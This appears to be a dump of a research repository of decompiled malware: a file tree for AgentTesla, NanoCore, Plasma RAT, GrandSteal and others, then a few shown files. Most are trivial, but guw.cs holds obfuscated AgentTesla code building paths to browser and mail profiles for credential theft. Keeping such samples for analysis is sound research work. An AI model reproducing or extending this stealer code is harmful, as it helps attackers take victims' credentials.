├── AgentTesla_FTP_Variant_05_2019
    ├── AGENTTESLA
    │   ├── -Module-.cs
    │   ├── IELibrary.resources
    │   ├── Properties
    │   │   └── AssemblyInfo.cs
    │   ├── afg.cs
    │   ├── cgo.cs
    │   ├── cjp.cs
    │   ├── clo.cs
    │   ├── clw.cs
    │   ├── cnq.cs
    │   ├── fq.cs
    │   ├── fz.cs
    │   ├── gmp.cs
    │   ├── gpu.cs
    │   ├── guw.cs
    │   ├── hj.cs
    │   ├── jox.cs
    │   ├── jpt.cs
    │   ├── jwq.cs
    │   ├── lpx.cs
    │   ├── mnp.cs
    │   ├── mnq.cs
    │   ├── mnr.cs
    │   ├── mns.cs
    │   ├── mnt.cs
    │   ├── mnu.cs
    │   ├── mnv.cs
    │   ├── mnw.cs
    │   ├── mnx.cs
    │   └── mny.cs
    └── decrypted_strings.txt
├── AgentTesla_SMTP_Variant_05_2019
    ├── AGENTTESLA
    │   ├── -Module-.cs
    │   ├── IELibrary.resources
    │   ├── Properties
    │   │   └── AssemblyInfo.cs
    │   ├── afg.cs
    │   ├── cgo.cs
    │   ├── cjp.cs
    │   ├── clo.cs
    │   ├── clw.cs
    │   ├── cnq.cs
    │   ├── fq.cs
    │   ├── fz.cs
    │   ├── gmp.cs
    │   ├── gpu.cs
    │   ├── guw.cs
    │   ├── hj.cs
    │   ├── jox.cs
    │   ├── jpt.cs
    │   ├── jwq.cs
    │   ├── lpx.cs
    │   ├── mnp.cs
    │   ├── mnq.cs
    │   ├── mnr.cs
    │   ├── mns.cs
    │   ├── mnt.cs
    │   ├── mnu.cs
    │   ├── mnv.cs
    │   ├── mnw.cs
    │   ├── mnx.cs
    │   └── mny.cs
    └── decrypted_strings.txt
├── FirebirdRAT_03_2020
    ├── ServerDll
    │   ├── Dll.sln
    │   └── Dll
    │   │   ├── AntiKill.cs
    │   │   ├── BrowserVNC.cs
    │   │   ├── CMD.cs
    │   │   ├── ChromeRecover.cs
    │   │   ├── Clog.cs
    │   │   ├── Dll.csproj
    │   │   ├── Dll.resources
    │   │   ├── EncryptionFunctions.cs
    │   │   ├── FFRecover.cs
    │   │   ├── FileZillaRecover.cs
    │   │   ├── FoxRecover.cs
    │   │   ├── Functions.cs
    │   │   ├── HVNC.cs
    │   │   ├── HandleMiner.cs
    │   │   ├── HandleRegistry.cs
    │   │   ├── InitalizePass.cs
    │   │   ├── OutlookRecover.cs
    │   │   ├── PrintClass.cs
    │   │   ├── Properties
    │   │       └── AssemblyInfo.cs
    │   │   ├── QQRecover.cs
    │   │   ├── RemoteChat.Designer.cs
    │   │   ├── RemoteChat.cs
    │   │   ├── RemoteDesktop.cs
    │   │   ├── RunPE.cs
    │   │   ├── Server.cs
    │   │   ├── SqLiteHandler.cs
    │   │   ├── TCPGet.cs
    │   │   ├── Webcam.cs
    │   │   └── app.manifest
    ├── ServerLoader
    │   ├── DEDICATEDTOGODREAL1.sln
    │   └── DEDICATEDTOGODREAL1
    │   │   ├── DEDICATEDTOGODREAL1.csproj
    │   │   ├── Dll1.resources
    │   │   ├── Properties
    │   │       └── AssemblyInfo.cs
    │   │   ├── Server.cs
    │   │   └── app.manifest
    └── WebcamDll
    │   ├── WebcamDll.sln
    │   └── WebcamDll
    │       ├── AForge
    │           └── Video
    │           │   ├── DirectShow
    │           │       ├── FilterCategory.cs
    │           │       ├── FilterInfo.cs
    │           │       ├── FilterInfoCollection.cs
    │           │       ├── Internals
    │           │       │   ├── AMMediaType.cs
    │           │       │   ├── AnalogVideoStandard.cs
    │           │       │   ├── BitmapInfoHeader.cs
    │           │       │   ├── CAUUID.cs
    │           │       │   ├── Clsid.cs
    │           │       │   ├── DsEvCode.cs
    │           │       │   ├── FilterInfo.cs
    │           │       │   ├── FindDirection.cs
    │           │       │   ├── FormatType.cs
    │           │       │   ├── IAMCameraControl.cs
    │           │       │   ├── IAMCrossbar.cs
    │           │       │   ├── IAMStreamConfig.cs
    │           │       │   ├── IAMVideoControl.cs
    │           │       │   ├── IBaseFilter.cs
    │           │       │   ├── ICaptureGraphBuilder2.cs
    │           │       │   ├── ICreateDevEnum.cs
    │           │       │   ├── IEnumFilters.cs
    │           │       │   ├── IEnumPins.cs
    │           │       │   ├── IFilterGraph.cs
    │           │       │   ├── IFilterGraph2.cs
    │           │       │   ├── IGraphBuilder.cs
    │           │       │   ├── IMediaControl.cs
    │           │       │   ├── IMediaEventEx.cs
    │           │       │   ├── IPin.cs
    │           │       │   ├── IPropertyBag.cs
    │           │       │   ├── IReferenceClock.cs
    │           │       │   ├── ISampleGrabber.cs
    │           │       │   ├── ISampleGrabberCB.cs
    │           │       │   ├── ISpecifyPropertyPages.cs
    │           │       │   ├── MediaSubType.cs
    │           │       │   ├── MediaType.cs
    │           │       │   ├── PinCategory.cs
    │           │       │   ├── PinDirection.cs
    │           │       │   ├── PinInfo.cs
    │           │       │   ├── RECT.cs
    │           │       │   ├── VideoControlFlags.cs
    │           │       │   ├── VideoInfoHeader.cs
    │           │       │   ├── VideoInfoHeader2.cs
    │           │       │   ├── VideoStreamConfigCaps.cs
    │           │       │   └── Win32.cs
    │           │       ├── PhysicalConnectorType.cs
    │           │       ├── VideoCapabilities.cs
    │           │       ├── VideoCaptureDevice.cs
    │           │       └── VideoInput.cs
    │           │   ├── IVideoSource.cs
    │           │   ├── NewFrameEventArgs.cs
    │           │   ├── NewFrameEventHandler.cs
    │           │   ├── PlayingFinishedEventHandler.cs
    │           │   ├── ReasonToFinishPlaying.cs
    │           │   ├── VideoSourceErrorEventArgs.cs
    │           │   └── VideoSourceErrorEventHandler.cs
    │       ├── Firebird
    │           └── CommandHandler.cs
    │       ├── Properties
    │           └── AssemblyInfo.cs
    │       └── WebcamDll.csproj
├── GrandSteal
    ├── GrandSteal.Client.Data
    │   └── GrandSteal.Client.Data
    │   │   ├── -Module-.cs
    │   │   ├── ConfusedByAttribute.cs
    │   │   ├── Gecko
    │   │       ├── Asn1Factory.cs
    │   │       ├── Asn1Object.cs
    │   │       ├── Asn1Type.cs
    │   │       ├── CrytoServiceProvider.cs
    │   │       ├── DataParser.cs
    │   │       ├── GeckoDatabase.cs
    │   │       ├── GeckoLogin.cs
    │   │       ├── GeckoPasswordBasedEncryption.cs
    │   │       └── GeckoRootEntry.cs
    │   │   ├── Helpers
    │   │       ├── ConstantStorage.cs
    │   │       ├── RecoveryHelper.cs
    │   │       └── SetupManager.cs
    │   │   ├── Properties
    │   │       └── AssemblyInfo.cs
    │   │   ├── Recovery
    │   │       ├── ChromiumManager.cs
    │   │       ├── ColdWalletManager.cs
    │   │       ├── DesktopFileManager.cs
    │   │       ├── DiscordManager.cs
    │   │       ├── FileZillaManager.cs
    │   │       ├── GeckoManager.cs
    │   │       ├── RdpManager.cs
    │   │       └── TelegramManager.cs
    │   │   ├── SQLite
    │   │       ├── DataRow.cs
    │   │       ├── FieldHeader.cs
    │   │       ├── MasterEntry.cs
    │   │       └── SqlConnection.cs
    │   │   ├── Server
    │   │       ├── RequestsExtensions.cs
    │   │       ├── ResponseHandler.cs
    │   │       └── ServerManager.cs
    │   │   ├── SetupStorage.Designer.cs
    │   │   └── SetupStorage.cs
    ├── GrandSteal.Client.Models
    │   └── GrandSteal.Client.Models
    │   │   ├── -Module-.cs
    │   │   ├── AsyncAction.2.cs
    │   │   ├── AsyncAction.cs
    │   │   ├── AsyncTask.cs
    │   │   ├── ClientInfoHelper.cs
    │   │   ├── ClientSettings.cs
    │   │   ├── ConfusedByAttribute.cs
    │   │   ├── Credentials
    │   │       └── ICredentialsManager.cs
    │   │   ├── Extensions
    │   │       ├── Json
    │   │       │   └── JsonExtensions.cs
    │   │       ├── Nulls
    │   │       │   └── IsNullExtension.cs
    │   │       ├── ProtoExtensions.cs
    │   │       └── Strings
    │   │       │   └── StringExtension.cs
    │   │   ├── GeoInformation.cs
    │   │   ├── GeoLocationHelper.cs
    │   │   ├── Properties
    │   │       ├── AssemblyInfo.cs
    │   │       ├── Resources.Designer.cs
    │   │       └── Settings.Designer.cs
    │   │   └── System
    │   │       └── Runtime
    │   │           └── CompilerServices
    │   │               └── ExtensionAttribute.cs
    ├── GrandSteal.Client.ViewModels
    │   └── GrandSteal.Client.ViewModels
    │   │   ├── -Module-.cs
    │   │   ├── AppViewModel.cs
    │   │   ├── ConfusedByAttribute.cs
    │   │   └── Properties
    │   │       └── AssemblyInfo.cs
    └── GrandSteal.SharedModels
    │   └── GrandSteal.SharedModels
    │       ├── -Module-.cs
    │       ├── Communication
    │           ├── CommunicationObject.cs
    │           ├── ProtoHelper.cs
    │           ├── Request.cs
    │           ├── RequestBase.cs
    │           ├── Response.cs
    │           └── ResponseBase.cs
    │       ├── ConfusedByAttribute.cs
    │       ├── CredentialsRequest.cs
    │       ├── Models
    │           ├── BrowserAutofill.cs
    │           ├── BrowserCookie.cs
    │           ├── BrowserCredendtial.cs
    │           ├── BrowserCreditCard.cs
    │           ├── BrowserProfile.cs
    │           ├── ClientSettings.cs
    │           ├── ColdWallet.cs
    │           ├── DesktopFile.cs
    │           ├── DiscordSession.cs
    │           ├── Event.cs
    │           ├── FtpCredential.cs
    │           ├── Hardware.cs
    │           ├── HardwareType.cs
    │           ├── Properties.cs
    │           ├── RdpCredential.cs
    │           ├── RemoteClientInformation.cs
    │           ├── RemoteProcess.cs
    │           └── TelegramSession.cs
    │       └── Properties
    │           └── AssemblyInfo.cs
├── Nanocore_06_2019
    ├── NanoCore Client.sln
    └── NanoCore Client
    │   ├── BaseCommand.cs
    │   ├── Class0.cs
    │   ├── Class1.cs
    │   ├── Class10.cs
    │   ├── Class11.cs
    │   ├── Class20.cs
    │   ├── Class21.cs
    │   ├── Class22.cs
    │   ├── Class23.cs
    │   ├── Class24.cs
    │   ├── Class25.cs
    │   ├── Class26.cs
    │   ├── Class27.cs
    │   ├── Class5.cs
    │   ├── Class6.cs
    │   ├── Class7.cs
    │   ├── Class8.cs
    │   ├── Class9.cs
    │   ├── Client.cs
    │   ├── ClientLoaderForm.Designer.cs
    │   ├── ClientLoaderForm.cs
    │   ├── ClientLoaderForm.resources
    │   ├── CommandType.cs
    │   ├── Delegate0.cs
    │   ├── FileCommand.cs
    │   ├── GClass0.cs
    │   ├── GClass1.cs
    │   ├── GClass10.cs
    │   ├── GClass2.cs
    │   ├── GClass3.cs
    │   ├── GClass4.cs
    │   ├── GClass5.cs
    │   ├── GClass6.cs
    │   ├── GClass7.cs
    │   ├── GClass8.cs
    │   ├── GClass9.cs
    │   ├── GDelegate0.cs
    │   ├── GStruct0.cs
    │   ├── GStruct1.cs
    │   ├── GStruct2.cs
    │   ├── GStruct3.cs
    │   ├── NanoCore Client.csproj
    │   ├── PluginCommand.cs
    │   └── Properties
    │       └── AssemblyInfo.cs
├── Plasma_RAT_06_2016
    ├── StubAdmin.bin.sln
    ├── StubAdmin.bin
    │   ├── InjectionLibrary
    │   │   ├── CRTInjection.cs
    │   │   ├── InjectionMethod.cs
    │   │   ├── InjectionMethodType.cs
    │   │   ├── ManualMap.cs
    │   │   ├── StandardInjectionMethod.cs
    │   │   └── ThreadHijack.cs
    │   ├── JLibrary
    │   │   ├── PortableExecutable
    │   │   │   ├── Constants.cs
    │   │   │   ├── DATA_DIRECTORIES.cs
    │   │   │   ├── IMAGE_BASE_RELOCATION.cs
    │   │   │   ├── IMAGE_DATA_DIRECTORY.cs
    │   │   │   ├── IMAGE_DOS_HEADER.cs
    │   │   │   ├── IMAGE_FILE_HEADER.cs
    │   │   │   ├── IMAGE_IMPORT_DESCRIPTOR.cs
    │   │   │   ├── IMAGE_NT_HEADER32.cs
    │   │   │   ├── IMAGE_OPTIONAL_HEADER32.cs
    │   │   │   ├── IMAGE_RESOURCE_DATA_ENTRY.cs
    │   │   │   ├── IMAGE_RESOURCE_DIRECTORY.cs
    │   │   │   ├── IMAGE_RESOURCE_DIRECTORY_ENTRY.cs
    │   │   │   ├── IMAGE_SECTION_HEADER.cs
    │   │   │   ├── IMAGE_THUNK_DATA.cs
    │   │   │   ├── PortableExecutable.cs
    │   │   │   ├── ResourceWalker.cs
    │   │   │   └── U1.cs
    │   │   ├── Tools
    │   │   │   ├── ErrorBase.cs
    │   │   │   ├── MemoryIterator.cs
    │   │   │   ├── UnmanagedBuffer.cs
    │   │   │   └── Utils.cs
    │   │   └── Win32
    │   │   │   ├── Win32Ptr.cs
    │   │   │   └── WinAPI.cs
    │   ├── Properties
    │   │   └── AssemblyInfo.cs
    │   ├── StubAdmin.bin.csproj
    │   ├── StubAdmin.bin.ico
    │   ├── System
    │   │   └── Runtime
    │   │   │   └── CompilerServices
    │   │   │       └── ExtensionAttribute.cs
    │   ├── System_Configuration
    │   │   ├── ARME.cs
    │   │   ├── AVKill.cs
    │   │   ├── AntiEverything.cs
    │   │   ├── BandwidthFlood.cs
    │   │   ├── BotKillers.cs
    │   │   ├── CheckAV.cs
    │   │   ├── Condis.cs
    │   │   ├── Disablers.cs
    │   │   ├── GPUMiner.cs
    │   │   ├── HTTPGet.cs
    │   │   ├── HardBK.cs
    │   │   ├── Injection.cs
    │   │   ├── KeyboardHook.cs
    │   │   ├── Logger.cs
    │   │   ├── Miner.cs
    │   │   ├── My
    │   │   │   ├── MyApplication.cs
    │   │   │   ├── MyComputer.cs
    │   │   │   ├── MyProject.cs
    │   │   │   ├── MySettings.Designer.cs
    │   │   │   ├── MySettings.settings
    │   │   │   ├── MySettingsProperty.cs
    │   │   │   └── Resources
    │   │   │   │   └── Resources.cs
    │   │   ├── Passwords.cs
    │   │   ├── Persistence.cs
    │   │   ├── PlasmaRAT.cs
    │   │   ├── PostHTTP.cs
    │   │   ├── ProcessAccessRights.cs
    │   │   ├── Resources.resources
    │   │   ├── SQLiteHandler.cs
    │   │   ├── SetProcCritical.cs
    │   │   ├── Slowloris.cs
    │   │   ├── Torrent.cs
    │   │   ├── UDP.cs
    │   │   └── mRunpe.cs
    │   └── app.manifest
    ├── configdec.txt
    ├── plasma_rat_image_summary.png
    └── plasmacfg.py
└── Unk1
    ├── sdfsdf.sln
    └── sdfsdf
        ├── -Module-{8AA6EFB8-4EF6-4D18-B36C-C300382F8161}.cs
        ├── Classes
            └── ClientRuleClass.cs
        ├── Containers
            └── ParamRuleContainer.cs
        ├── Descriptors
            └── ParserSpecificationDescriptor.cs
        ├── Dictionaries
            └── Parser.cs
        ├── EnteryNameSpace
            └── BotModule.cs
        ├── Properties
            ├── AssemblyInfo.cs
            ├── Resources.resources
            ├── Settings.Designer.cs
            └── Settings.settings
        ├── Queues
            └── Customer.cs
        ├── RemoteClient
            ├── Compression
            │   └── JpgCompression.cs
            ├── Consumers
            │   └── Method.cs
            ├── FastCodec.cs
            ├── Mappers
            │   ├── DescriptorMapper.cs
            │   └── SchemaMapper.cs
            ├── Pakcets
            │   └── Client
            │   │   └── Packets.cs
            ├── Polices
            │   └── InvocationProcessPolicy.cs
            ├── Program.cs
            ├── Properties
            │   └── Resources.cs
            ├── RemoteClient.cs
            ├── Schemes
            │   ├── MapperProductSchema.cs
            │   └── Product.cs
            ├── Streaming.cs
            ├── Tasks
            │   └── ProcessListenerTask.cs
            └── nagruz
            │   ├── sdfsdfdsg.Designer.cs
            │   ├── sdfsdfdsg.cs
            │   └── sdfsdfdsg.resources
        ├── Resolver
            ├── DatabaseParserResolver.cs
            └── TokenizerParserResolver.cs
        ├── aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources
        ├── fdghdfghdfg
            ├── WindowsApi.cs
            └── WindowsUtility.cs
        ├── sdfsdf.csproj
        ├── sdfsdf.g.resources
        └── sdfsdf.ico


/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/IELibrary.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/IELibrary.resources


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Reflection;
3 | using System.Runtime.CompilerServices;
4 | 
5 | [assembly: AssemblyVersion("0.0.0.0")]
6 | [assembly: CompilationRelaxations(8)]
7 | [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
8 | [module: SuppressIldasm]
9 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/clo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.ComponentModel;
 3 | 
 4 | // Token: 0x02000029 RID: 41
 5 | internal sealed class clo
 6 | {
 7 | 	// Token: 0x1700000C RID: 12
 8 | 	// (get) Token: 0x06000102 RID: 258 RVA: 0x00023AF8 File Offset: 0x00021CF8
 9 | 	// (set) Token: 0x06000103 RID: 259 RVA: 0x00023B0C File Offset: 0x00021D0C
10 | 	[DefaultValue("")]
11 | 	internal string clu
12 | 	{
13 | 		get
14 | 		{
15 | 			return this.clr;
16 | 		}
17 | 		set
18 | 		{
19 | 			this.clr = value;
20 | 		}
21 | 	}
22 | 
23 | 	// Token: 0x1700000D RID: 13
24 | 	// (get) Token: 0x06000104 RID: 260 RVA: 0x00023B20 File Offset: 0x00021D20
25 | 	// (set) Token: 0x06000105 RID: 261 RVA: 0x00023B34 File Offset: 0x00021D34
26 | 	[DefaultValue("")]
27 | 	internal string clv
28 | 	{
29 | 		get
30 | 		{
31 | 			return this.cls;
32 | 		}
33 | 		set
34 | 		{
35 | 			this.cls = value;
36 | 		}
37 | 	}
38 | 
39 | 	// Token: 0x1700000E RID: 14
40 | 	// (get) Token: 0x06000106 RID: 262 RVA: 0x00023B48 File Offset: 0x00021D48
41 | 	// (set) Token: 0x06000107 RID: 263 RVA: 0x00023B5C File Offset: 0x00021D5C
42 | 	[DefaultValue("")]
43 | 	internal string cly
44 | 	{
45 | 		get
46 | 		{
47 | 			return this.clt;
48 | 		}
49 | 		set
50 | 		{
51 | 			this.clt = value;
52 | 		}
53 | 	}
54 | 
55 | 	// Token: 0x1700000F RID: 15
56 | 	// (get) Token: 0x06000108 RID: 264 RVA: 0x00023B70 File Offset: 0x00021D70
57 | 	// (set) Token: 0x06000109 RID: 265 RVA: 0x00023B84 File Offset: 0x00021D84
58 | 	[DefaultValue("")]
59 | 	internal string clx
60 | 	{
61 | 		get
62 | 		{
63 | 			return this.clp;
64 | 		}
65 | 		set
66 | 		{
67 | 			this.clp = value;
68 | 		}
69 | 	}
70 | 
71 | 	// Token: 0x040003A0 RID: 928
72 | 	private string clp;
73 | 
74 | 	// Token: 0x040003A1 RID: 929
75 | 	private string clr;
76 | 
77 | 	// Token: 0x040003A2 RID: 930
78 | 	private string cls;
79 | 
80 | 	// Token: 0x040003A3 RID: 931
81 | 	private string clt;
82 | }
83 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/fq.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.ComponentModel;
 4 | using Microsoft.VisualBasic.ApplicationServices;
 5 | 
 6 | namespace My
 7 | {
 8 | 	// Token: 0x0200000B RID: 11
 9 | 	[GeneratedCode("MyTemplate", "8.0.0.0")]
10 | 	[EditorBrowsable(EditorBrowsableState.Never)]
11 | 	internal class fq : ApplicationBase
12 | 	{
13 | 	}
14 | }
15 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/fz.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.ComponentModel;
 4 | using System.Diagnostics;
 5 | using Microsoft.VisualBasic.Devices;
 6 | 
 7 | namespace My
 8 | {
 9 | 	// Token: 0x0200000C RID: 12
10 | 	[GeneratedCode("MyTemplate", "8.0.0.0")]
11 | 	[EditorBrowsable(EditorBrowsableState.Never)]
12 | 	internal class fz : Computer
13 | 	{
14 | 		// Token: 0x0600003A RID: 58 RVA: 0x000193F4 File Offset: 0x000175F4
15 | 		[EditorBrowsable(EditorBrowsableState.Never)]
16 | 		[DebuggerHidden]
17 | 		public fz()
18 | 		{
19 | 		}
20 | 	}
21 | }
22 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/guw.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using Microsoft.VisualBasic.CompilerServices;
 3 | 
 4 | // Token: 0x0200002F RID: 47
 5 | [StandardModule]
 6 | public sealed class guw
 7 | {
 8 | 	// Token: 0x06000155 RID: 341 RVA: 0x0002E930 File Offset: 0x0002CB30
 9 | 	// Note: this type is marked as 'beforefieldinit'.
10 | 	static guw()
11 | 	{
12 | 		for (;;)
13 | 		{
14 | 			IL_141:
15 | 			uint num = 4446615u;
16 | 			for (;;)
17 | 			{
18 | 				uint num2;
19 | 				switch ((num2 = (num ^ 702862437u)) % 5u)
20 | 				{
21 | 				case 1u:
22 | 					guw.KMeleon = guw.guq + <Module>.smethod_0(481760);
23 | 					num = (num2 * 1669638238u ^ 946569624u);
24 | 					continue;
25 | 				case 2u:
26 | 					guw.BlackHawk = guw.guq + <Module>.smethod_0(481920);
27 | 					guw.CyberFox = guw.guq + <Module>.smethod_0(481712);
28 | 					num = (num2 * 1304476206u ^ 1728217697u);
29 | 					continue;
30 | 				case 3u:
31 | 					guw.Thunderbird = guw.guq + <Module>.smethod_0(482160);
32 | 					guw.SeaMonkey = guw.guq + <Module>.smethod_0(481952);
33 | 					guw.Flock = guw.guq + <Module>.smethod_0(481872);
34 | 					num = (num2 * 504193575u ^ 1776923320u);
35 | 					continue;
36 | 				case 4u:
37 | 					goto IL_141;
38 | 				}
39 | 				goto Block_1;
40 | 			}
41 | 		}
42 | 		Block_1:
43 | 		guw.IceCat = guw.guq + <Module>.smethod_0(482704);
44 | 	}
45 | 
46 | 	// Token: 0x040003A9 RID: 937
47 | 	private static string guq = Environment.GetEnvironmentVariable(<Module>.smethod_0(483424));
48 | 
49 | 	// Token: 0x040003AA RID: 938
50 | 	public static string Mozilla = guw.guq + <Module>.smethod_0(483344);
51 | 
52 | 	// Token: 0x040003AB RID: 939
53 | 	public static string Postbox = guw.guq + <Module>.smethod_0(482112);
54 | 
55 | 	// Token: 0x040003AC RID: 940
56 | 	public static string Thunderbird;
57 | 
58 | 	// Token: 0x040003AD RID: 941
59 | 	public static string SeaMonkey;
60 | 
61 | 	// Token: 0x040003AE RID: 942
62 | 	public static string Flock;
63 | 
64 | 	// Token: 0x040003AF RID: 943
65 | 	public static string BlackHawk;
66 | 
67 | 	// Token: 0x040003B0 RID: 944
68 | 	public static string CyberFox;
69 | 
70 | 	// Token: 0x040003B1 RID: 945
71 | 	public static string KMeleon;
72 | 
73 | 	// Token: 0x040003B2 RID: 946
74 | 	public static string IceCat;
75 | }
76 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/mnp.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x02000045 RID: 69
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 57824)]
6 | internal struct mnp
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/mnq.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x0200004E RID: 78
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 144)]
6 | internal struct mnq
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/mnr.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x02000046 RID: 70
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 64)]
6 | internal struct mnr
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/mns.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x02000047 RID: 71
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 80)]
6 | internal struct mns
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/mnt.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x02000048 RID: 72
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 96)]
6 | internal struct mnt
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/mnu.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x02000049 RID: 73
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 128)]
6 | internal struct mnu
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/mnv.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x0200004A RID: 74
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 224)]
6 | internal struct mnv
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/mnw.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x0200004D RID: 77
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 160)]
6 | internal struct mnw
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/mnx.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x0200004C RID: 76
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 176)]
6 | internal struct mnx
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_FTP_Variant_05_2019/AGENTTESLA/mny.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | 
4 | // Token: 0x0200004B RID: 75
5 | [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 112)]
6 | internal struct mny
7 | {
8 | }
9 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/IELibrary.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/IELibrary.resources


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Reflection;
3 | using System.Runtime.CompilerServices;
4 | 
5 | [assembly: AssemblyVersion("0.0.0.0")]
6 | [assembly: CompilationRelaxations(8)]
7 | [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
8 | [module: SuppressIldasm]
9 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/clo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.ComponentModel;
 3 | 
 4 | // Token: 0x02000029 RID: 41
 5 | internal sealed class clo
 6 | {
 7 | 	// Token: 0x1700000C RID: 12
 8 | 	// (get) Token: 0x06000102 RID: 258 RVA: 0x0002391C File Offset: 0x00021B1C
 9 | 	// (set) Token: 0x06000103 RID: 259 RVA: 0x00023930 File Offset: 0x00021B30
10 | 	[DefaultValue("")]
11 | 	internal string clu
12 | 	{
13 | 		get
14 | 		{
15 | 			return this.clr;
16 | 		}
17 | 		set
18 | 		{
19 | 			this.clr = value;
20 | 		}
21 | 	}
22 | 
23 | 	// Token: 0x1700000D RID: 13
24 | 	// (get) Token: 0x06000104 RID: 260 RVA: 0x00023944 File Offset: 0x00021B44
25 | 	// (set) Token: 0x06000105 RID: 261 RVA: 0x00023958 File Offset: 0x00021B58
26 | 	[DefaultValue("")]
27 | 	internal string clv
28 | 	{
29 | 		get
30 | 		{
31 | 			return this.cls;
32 | 		}
33 | 		set
34 | 		{
35 | 			this.cls = value;
36 | 		}
37 | 	}
38 | 
39 | 	// Token: 0x1700000E RID: 14
40 | 	// (get) Token: 0x06000106 RID: 262 RVA: 0x0002396C File Offset: 0x00021B6C
41 | 	// (set) Token: 0x06000107 RID: 263 RVA: 0x00023980 File Offset: 0x00021B80
42 | 	[DefaultValue("")]
43 | 	internal string cly
44 | 	{
45 | 		get
46 | 		{
47 | 			return this.clt;
48 | 		}
49 | 		set
50 | 		{
51 | 			this.clt = value;
52 | 		}
53 | 	}
54 | 
55 | 	// Token: 0x1700000F RID: 15
56 | 	// (get) Token: 0x06000108 RID: 264 RVA: 0x00023994 File Offset: 0x00021B94
57 | 	// (set) Token: 0x06000109 RID: 265 RVA: 0x000239A8 File Offset: 0x00021BA8
58 | 	[DefaultValue("")]
59 | 	internal string clx
60 | 	{
61 | 		get
62 | 		{
63 | 			return this.clp;
64 | 		}
65 | 		set
66 | 		{
67 | 			this.clp = value;
68 | 		}
69 | 	}
70 | 
71 | 	// Token: 0x04000397 RID: 919
72 | 	private string clp;
73 | 
74 | 	// Token: 0x04000398 RID: 920
75 | 	private string clr;
76 | 
77 | 	// Token: 0x04000399 RID: 921
78 | 	private string cls;
79 | 
80 | 	// Token: 0x0400039A RID: 922
81 | 	private string clt;
82 | }
83 | 


--------------------------------------------------------------------------------
/AgentTesla_SMTP_Variant_05_2019/AGENTTESLA/fq.cs:
